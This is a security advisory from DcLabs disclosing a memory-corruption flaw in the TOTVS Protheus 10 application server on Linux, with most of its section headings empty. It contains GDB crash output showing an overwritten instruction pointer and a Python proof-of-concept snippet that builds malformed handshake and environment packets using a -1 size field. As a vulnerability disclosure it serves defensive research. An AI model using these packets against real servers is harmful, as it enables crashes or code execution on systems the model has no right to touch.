[DCA-2011-0010]
[Discussion]
[Software]
[Vendor Product Description]
[Advisory Timeline]
[Bug Summary]
[Impact]
[Affected Version]
[Bug Description and Proof of Concept]
— GDB OUTPUT BEGIN —
Attaching to process 12748
Reading symbols from
/microsiga/protheus10/bin/appserver/totvssrvlinux…(no debugging
symbols found)…done.
— snippet output —
warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash
at ffffe0b4
0xffffe410 in __kernel_vsyscall ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 4117961632 (LWP 12775)]
0x6b035205 in ?? ()
(gdb) bt
#0 0x6b035205 in ?? ()
#1 0x080917ed in pthread_equal ()
#2 0x08bd7389 in ?? ()
#3 0x08c04398 in ?? ()
#4 0x08ba2c21 in ?? ()
#5 0x08ba3a88 in ?? ()
#6 0x08ba3c1f in ?? ()
#7 0x08bcda16 in ?? ()
#8 0x08091c4b in pthread_equal ()
#9 0x08b85239 in ?? ()
#10 0x08b856d6 in ?? ()
#11 0xf7ef22ab in start_thread () from /lib/libpthread.so.0
#12 0xf7e59dbe in clone () from /lib/libc.so.6
(gdb) x/10i $eip
0x6b035205: Cannot access memory at address 0x6b035205
(gdb) i r
eax 0xbee7780 200177536
ecx 0x2 2
edx 0x1 1
ebx 0xf57306d0 -177010992
esp 0xf57306ac 0xf57306ac
ebp 0xf5730708 0xf5730708
esi 0xf57306d8 -177010984
edi 0x6315 25365
eip 0x6b035205 0x6b035205
eflags 0x10283 [ CF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) quit
— GDB OUTPUT END —
We clearly overwrote EIP register, pointing it to a nonsense location.
Here is a snippet of a python exploit:
— CODE SNIPPET BEGIN —
if options.target == 8:
version = "20081215030344"
else:
version = "20100812040605"
packet_handshake = (
"%14s"
"\x00\x01"
"%36s\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"%32s\x00"
"%s\x00"
"\x00\x00\x14\x01"
) % ("A"*14, "B"*36, "C"*32, version)
packet_environ = (
"\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"
"\xff\xff\xff\xff" # Memory Corruption (-1 as size)
"\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
"\x00\x00%7s\x00\x00\x00\x00\x00\x00"
"%11s\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
) % ("D"*7, "E"*11)
— CODE SNIPPET END —
— GDB OUTPUT BEGIN —
(gdb) print /d (int)0x00000038
$4 = 56
(gdb) print /d (unsigned int)0x00000038
$5 = 56
(gdb) print /d (int)0xffffffff
$6 = -1
(gdb) print /d (unsigned int)0xffffffff
$7 = 4294967295
— GDB OUTPUT END —
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Solution / Workarounds]
[Credits]
DcLabs Security Research Group.
Atenciosamente,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com